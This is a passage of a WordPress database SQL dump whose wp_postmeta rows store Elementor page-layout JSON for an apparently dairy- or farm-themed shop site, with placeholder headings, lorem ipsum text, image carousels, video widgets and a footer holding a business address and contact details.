\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8946,1537,'_elementor_page_assets','a:0:{}'),(8962,1539,'_elementor_edit_mode','builder'),(8963,1539,'_elementor_template_type','wp-page'),(8964,1539,'_elementor_version','3.7.8'),(8965,1539,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (8966,1539,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8967,1539,'_elementor_page_assets','a:0:{}'),(8969,1540,'_elementor_edit_mode','builder'),(8970,1540,'_elementor_template_type','wp-page'),(8971,1540,'_elementor_version','3.7.8'),(8972,1540,'_wp_page_template','elementor_canvas'),(8973,1540,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 